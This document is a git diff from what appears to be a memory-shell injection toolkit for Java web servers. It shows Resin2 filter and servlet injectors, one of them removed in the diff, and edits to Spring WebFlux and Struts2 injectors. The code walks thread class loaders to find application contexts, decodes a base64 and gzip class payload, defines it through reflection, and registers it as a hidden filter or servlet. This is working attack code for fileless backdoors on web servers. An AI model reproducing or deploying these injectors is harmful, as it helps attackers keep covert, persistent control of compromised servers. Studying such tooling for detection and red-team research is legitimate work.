|
||||
|
||||
private Object getApplicationFromClassLoader(ClassLoader classLoader) {
|
||||
while (classLoader != null) {
|
||||
try {
|
||||
Object context = invokeMethod(classLoader, "getAttribute", new Class[]{String.class}, new Object[]{"caucho.application"});
|
||||
if (context != null && "com.caucho.server.http.Application".equals(context.getClass().getName())) {
|
||||
return context;
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
classLoader = classLoader.getParent();
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
public ClassLoader getWebAppClassLoader(Object context) throws Exception {
|
||||
try {
|
||||
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
|
||||
} catch (Exception e) {
|
||||
return ((ClassLoader) getFieldValue(context, "_classLoader"));
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private Object getShell(Object context) throws Exception {
|
||||
ClassLoader classLoader = getWebAppClassLoader(context);
|
||||
Class<?> clazz = null;
|
||||
try {
|
||||
clazz = classLoader.loadClass(getClassName());
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||
defineClass.setAccessible(true);
|
||||
clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
|
||||
}
|
||||
msg += "[" + classLoader.getClass().getName() + "] ";
|
||||
return clazz.newInstance();
|
||||
}
|
||||
|
||||
private void inject(Object context, Object filter) throws Exception {
|
||||
Map<String, Object> filters = (Map) getFieldValue(context, "_filters");
|
||||
for (String key : filters.keySet()) {
|
||||
if (key.contains(getClassName())) {
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
||||
ClassLoader loader = context.getClass().getClassLoader();
|
||||
Class<?> applicationClass = loader.loadClass("com.caucho.server.http.Application");
|
||||
Class<?> qFilterConfigClass = loader.loadClass("com.caucho.server.http.QFilterConfig");
|
||||
Class<?> registryNodeClass = loader.loadClass("com.caucho.util.RegistryNode");
|
||||
Object filterConfig = newInstance(
|
||||
qFilterConfigClass,
|
||||
new Class[]{applicationClass, String.class, String.class, registryNodeClass},
|
||||
new Object[]{context, getClassName(), getClassName(), null});
|
||||
filters.put(getClassName(), filterConfig);
|
||||
|
||||
List filterList = (List) getFieldValue(context, "_filterList");
|
||||
if (filterList != null && !filterList.contains(filterConfig)) {
|
||||
filterList.add(filterConfig);
|
||||
}
|
||||
|
||||
Class<?> filterMapClass = loader.loadClass("com.caucho.server.http.FilterMap");
|
||||
Object filterMap = newInstance(filterMapClass, new Class[0], new Object[0]);
|
||||
invokeMethod(filterMap, "setURLPattern", new Class[]{String.class, String.class}, new Object[]{getUrlPattern(), ""});
|
||||
invokeMethod(filterMap, "setData", new Class[]{Object.class}, new Object[]{filterConfig});
|
||||
|
||||
List filterMaps = (List) getFieldValue(context, "_filterMap");
|
||||
synchronized (filterMaps) {
|
||||
filterMaps.add(0, filterMap);
|
||||
}
|
||||
invokeMethod(context, "clearCache", null, null);
|
||||
}
|
||||
|
||||
private static Object newInstance(Class<?> clazz, Class<?>[] paramClazz, Object[] param) throws Exception {
|
||||
Constructor<?> constructor = clazz.getDeclaredConstructor(paramClazz);
|
||||
constructor.setAccessible(true);
|
||||
return constructor.newInstance(param);
|
||||
}
|
||||
|
||||
@Override
|
||||
public String toString() {
|
||||
return msg;
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] decodeBase64(String base64Str) throws Exception {
|
||||
Class<?> decoderClass;
|
||||
try {
|
||||
decoderClass = Class.forName("java.util.Base64");
|
||||
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
|
||||
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
|
||||
} catch (Exception ignored) {
|
||||
decoderClass = Class.forName("sun.misc.BASE64Decoder");
|
||||
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
|
||||
ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||
GZIPInputStream gzipInputStream = null;
|
||||
try {
|
||||
gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
|
||||
byte[] buffer = new byte[4096];
|
||||
int n;
|
||||
while ((n = gzipInputStream.read(buffer)) > 0) {
|
||||
out.write(buffer, 0, n);
|
||||
}
|
||||
return out.toByteArray();
|
||||
} finally {
|
||||
if (gzipInputStream != null) {
|
||||
gzipInputStream.close();
|
||||
}
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object getFieldValue(Object obj, String name) throws Exception {
|
||||
Class<?> clazz = obj.getClass();
|
||||
while (clazz != Object.class) {
|
||||
try {
|
||||
Field field = clazz.getDeclaredField(name);
|
||||
field.setAccessible(true);
|
||||
return field.get(obj);
|
||||
} catch (NoSuchFieldException var5) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) throws Exception {
|
||||
Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
|
||||
Method method = null;
|
||||
while (clazz != null && method == null) {
|
||||
try {
|
||||
if (paramClazz == null) {
|
||||
method = clazz.getDeclaredMethod(methodName);
|
||||
} else {
|
||||
method = clazz.getDeclaredMethod(methodName, paramClazz);
|
||||
}
|
||||
} catch (NoSuchMethodException e) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
if (method == null) {
|
||||
throw new NoSuchMethodException("Method not found: " + methodName);
|
||||
}
|
||||
method.setAccessible(true);
|
||||
return method.invoke(obj instanceof Class ? null : obj, param);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getErrorMessage(Throwable throwable) {
|
||||
PrintStream printStream = null;
|
||||
try {
|
||||
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
|
||||
printStream = new PrintStream(outputStream);
|
||||
throwable.printStackTrace(printStream);
|
||||
return outputStream.toString();
|
||||
} finally {
|
||||
if (printStream != null) {
|
||||
printStream.close();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
-248
@@ -1,248 +0,0 @@
|
||||
package com.reajason.javaweb.memshell.injector.resin2;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
import java.io.IOException;
|
||||
import java.io.PrintStream;
|
||||
import java.lang.reflect.Field;
|
||||
import java.lang.reflect.Method;
|
||||
import java.util.HashSet;
|
||||
import java.util.Map;
|
||||
import java.util.Set;
|
||||
import java.util.zip.GZIPInputStream;
|
||||
|
||||
/**
|
||||
* @author ReaJason
|
||||
* @since 2026/7/4
|
||||
*/
|
||||
public class Resin2ServletInjector {
|
||||
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
|
||||
public String getUrlPattern() {
|
||||
return "{{urlPattern}}";
|
||||
}
|
||||
|
||||
public String getClassName() {
|
||||
return "{{className}}";
|
||||
}
|
||||
|
||||
public String getBase64String() throws IOException {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public Resin2ServletInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
Set<Object> contexts = null;
|
||||
try {
|
||||
contexts = getContext();
|
||||
} catch (Throwable throwable) {
|
||||
msg += "context error: " + getErrorMessage(throwable);
|
||||
}
|
||||
if (contexts == null || contexts.isEmpty()) {
|
||||
msg += "context not found";
|
||||
} else {
|
||||
for (Object context : contexts) {
|
||||
try {
|
||||
msg += ("context: [" + getContextRoot(context) + "] ");
|
||||
Object shell = getShell(context);
|
||||
inject(context, shell);
|
||||
msg += "[" + getUrlPattern() + "] ready\n";
|
||||
} catch (Throwable e) {
|
||||
msg += "failed " + getErrorMessage(e) + "\n";
|
||||
}
|
||||
}
|
||||
}
|
||||
ok = true;
|
||||
System.out.println(msg);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getContextRoot(Object context) {
|
||||
String r = null;
|
||||
try {
|
||||
r = (String) invokeMethod(context, "getContextPath", null, null);
|
||||
} catch (Exception ignored) {
|
||||
}
|
||||
String c = context.getClass().getName();
|
||||
if (r == null) {
|
||||
return c;
|
||||
}
|
||||
if (r.isEmpty()) {
|
||||
return c + "(/)";
|
||||
}
|
||||
return c + "(" + r + ")";
|
||||
}
|
||||
|
||||
public Set<Object> getContext() throws Exception {
|
||||
Set<Object> contexts = new HashSet<Object>();
|
||||
addContextFromClassLoader(contexts, Thread.currentThread().getContextClassLoader());
|
||||
Set<Thread> threads = Thread.getAllStackTraces().keySet();
|
||||
for (Thread thread : threads) {
|
||||
try {
|
||||
addContextFromClassLoader(contexts, thread.getContextClassLoader());
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
}
|
||||
return contexts;
|
||||
}
|
||||
|
||||
private void addContextFromClassLoader(Set<Object> contexts, ClassLoader classLoader) {
|
||||
Object context = getApplicationFromClassLoader(classLoader);
|
||||
if (context != null) {
|
||||
contexts.add(context);
|
||||
}
|
||||
}
|
||||
|
||||
private Object getApplicationFromClassLoader(ClassLoader classLoader) {
|
||||
while (classLoader != null) {
|
||||
try {
|
||||
Object context = invokeMethod(classLoader, "getAttribute", new Class[]{String.class}, new Object[]{"caucho.application"});
|
||||
if (context != null && "com.caucho.server.http.Application".equals(context.getClass().getName())) {
|
||||
return context;
|
||||
}
|
||||
} catch (Throwable ignored) {
|
||||
}
|
||||
classLoader = classLoader.getParent();
|
||||
}
|
||||
return null;
|
||||
}
|
||||
|
||||
public ClassLoader getWebAppClassLoader(Object context) throws Exception {
|
||||
try {
|
||||
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
|
||||
} catch (Exception e) {
|
||||
return ((ClassLoader) getFieldValue(context, "_classLoader"));
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private Object getShell(Object context) throws Exception {
|
||||
ClassLoader classLoader = getWebAppClassLoader(context);
|
||||
Class<?> clazz = null;
|
||||
try {
|
||||
clazz = classLoader.loadClass(getClassName());
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||
defineClass.setAccessible(true);
|
||||
clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
|
||||
}
|
||||
msg += "[" + classLoader.getClass().getName() + "] ";
|
||||
return clazz.newInstance();
|
||||
}
|
||||
|
||||
private void inject(Object context, Object servlet) throws Exception {
|
||||
Map<String, Object> servlets = (Map) getFieldValue(context, "_servlets");
|
||||
for (String key : servlets.keySet()) {
|
||||
if (key.contains(getClassName())) {
|
||||
return;
|
||||
}
|
||||
}
|
||||
Object servletConfig = invokeMethod(
|
||||
context,
|
||||
"addServlet",
|
||||
new Class[]{String.class, String.class},
|
||||
new Object[]{getClassName(), getClassName()});
|
||||
Class<?> servletConfigClass = context.getClass().getClassLoader().loadClass("com.caucho.server.http.QServletConfig");
|
||||
invokeMethod(
|
||||
context,
|
||||
"addDispatchMap",
|
||||
new Class[]{String.class, servletConfigClass},
|
||||
new Object[]{getUrlPattern(), servletConfig});
|
||||
invokeMethod(context, "clearCache", null, null);
|
||||
}
|
||||
|
||||
@Override
|
||||
public String toString() {
|
||||
return msg;
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] decodeBase64(String base64Str) throws Exception {
|
||||
Class<?> decoderClass;
|
||||
try {
|
||||
decoderClass = Class.forName("java.util.Base64");
|
||||
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
|
||||
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
|
||||
} catch (Exception ignored) {
|
||||
decoderClass = Class.forName("sun.misc.BASE64Decoder");
|
||||
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
|
||||
ByteArrayOutputStream out = new ByteArrayOutputStream();
|
||||
GZIPInputStream gzipInputStream = null;
|
||||
try {
|
||||
gzipInputStream = new GZIPInputStream(new ByteArrayInputStream(compressedData));
|
||||
byte[] buffer = new byte[4096];
|
||||
int n;
|
||||
while ((n = gzipInputStream.read(buffer)) > 0) {
|
||||
out.write(buffer, 0, n);
|
||||
}
|
||||
return out.toByteArray();
|
||||
} finally {
|
||||
if (gzipInputStream != null) {
|
||||
gzipInputStream.close();
|
||||
}
|
||||
out.close();
|
||||
}
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object getFieldValue(Object obj, String name) throws Exception {
|
||||
Class<?> clazz = obj.getClass();
|
||||
while (clazz != Object.class) {
|
||||
try {
|
||||
Field field = clazz.getDeclaredField(name);
|
||||
field.setAccessible(true);
|
||||
return field.get(obj);
|
||||
} catch (NoSuchFieldException var5) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
throw new NoSuchFieldException(obj.getClass().getName() + " Field not found: " + name);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
public static Object invokeMethod(Object obj, String methodName, Class<?>[] paramClazz, Object[] param) throws Exception {
|
||||
Class<?> clazz = (obj instanceof Class) ? (Class<?>) obj : obj.getClass();
|
||||
Method method = null;
|
||||
while (clazz != null && method == null) {
|
||||
try {
|
||||
if (paramClazz == null) {
|
||||
method = clazz.getDeclaredMethod(methodName);
|
||||
} else {
|
||||
method = clazz.getDeclaredMethod(methodName, paramClazz);
|
||||
}
|
||||
} catch (NoSuchMethodException e) {
|
||||
clazz = clazz.getSuperclass();
|
||||
}
|
||||
}
|
||||
if (method == null) {
|
||||
throw new NoSuchMethodException("Method not found: " + methodName);
|
||||
}
|
||||
method.setAccessible(true);
|
||||
return method.invoke(obj instanceof Class ? null : obj, param);
|
||||
}
|
||||
|
||||
@SuppressWarnings("all")
|
||||
private String getErrorMessage(Throwable throwable) {
|
||||
PrintStream printStream = null;
|
||||
try {
|
||||
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
|
||||
printStream = new PrintStream(outputStream);
|
||||
throwable.printStackTrace(printStream);
|
||||
return outputStream.toString();
|
||||
} finally {
|
||||
if (printStream != null) {
|
||||
printStream.close();
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
+2
-1
@@ -1,5 +1,6 @@
|
||||
package com.reajason.javaweb.memshell.injector.springwebflux;
|
||||
|
||||
import org.springframework.util.Base64Utils;
|
||||
import org.springframework.web.reactive.function.server.*;
|
||||
import org.springframework.web.reactive.function.server.support.RouterFunctionMapping;
|
||||
|
||||
@@ -62,7 +63,7 @@ public class SpringWebFluxHandlerFunctionInjector {
|
||||
try {
|
||||
interceptor = classLoader.loadClass(getClassName()).newInstance();
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(java.util.Base64.getDecoder().decode(getBase64String()));
|
||||
byte[] clazzByte = gzipDecompress(Base64Utils.decodeFromString(getBase64String()));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||
defineClass.setAccessible(true);
|
||||
Class<?> clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
|
||||
|
||||
+2
-1
@@ -1,5 +1,6 @@
|
||||
package com.reajason.javaweb.memshell.injector.springwebflux;
|
||||
|
||||
import org.springframework.util.Base64Utils;
|
||||
import org.springframework.web.method.HandlerMethod;
|
||||
import org.springframework.web.reactive.result.method.RequestMappingInfo;
|
||||
import org.springframework.web.reactive.result.method.annotation.RequestMappingHandlerMapping;
|
||||
@@ -62,7 +63,7 @@ public class SpringWebFluxHandlerMethodInjector {
|
||||
try {
|
||||
interceptor = classLoader.loadClass(getClassName()).newInstance();
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(java.util.Base64.getDecoder().decode(getBase64String()));
|
||||
byte[] clazzByte = gzipDecompress(Base64Utils.decodeFromString(getBase64String()));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||
defineClass.setAccessible(true);
|
||||
Class<?> clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
|
||||
|
||||
+2
-1
@@ -1,5 +1,6 @@
|
||||
package com.reajason.javaweb.memshell.injector.springwebflux;
|
||||
|
||||
import org.springframework.util.Base64Utils;
|
||||
import org.springframework.web.server.WebFilter;
|
||||
import org.springframework.web.server.handler.DefaultWebFilterChain;
|
||||
import org.springframework.web.server.handler.FilteringWebHandler;
|
||||
@@ -57,7 +58,7 @@ public class SpringWebFluxWebFilterInjector {
|
||||
try {
|
||||
return classLoader.loadClass(getClassName()).newInstance();
|
||||
} catch (Exception e) {
|
||||
byte[] clazzByte = gzipDecompress(java.util.Base64.getDecoder().decode(getBase64String()));
|
||||
byte[] clazzByte = gzipDecompress(Base64Utils.decodeFromString(getBase64String()));
|
||||
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
|
||||
defineClass.setAccessible(true);
|
||||
Class<?> clazz = (Class<?>) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
|
||||
|
||||
+3
-3
@@ -1,4 +1,4 @@
|
||||
package com.reajason.javaweb.memshell.injector.struts2;
|
||||
package com.reajason.javaweb.memshell.injector.struct2;
|
||||
|
||||
import java.io.ByteArrayInputStream;
|
||||
import java.io.ByteArrayOutputStream;
|
||||
@@ -15,7 +15,7 @@ import java.util.zip.GZIPInputStream;
|
||||
* @author ReaJason
|
||||
* @since 2025/12/8
|
||||
*/
|
||||
public class Struts2ActionInjector {
|
||||
public class Struct2ActionInjector {
|
||||
|
||||
private static String msg = "";
|
||||
private static boolean ok = false;
|
||||
@@ -32,7 +32,7 @@ public class Struts2ActionInjector {
|
||||
return "{{base64Str}}";
|
||||
}
|
||||
|
||||
public Struts2ActionInjector() {
|
||||
public Struct2ActionInjector() {
|
||||
if (ok) {
|
||||
return;
|
||||
}
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user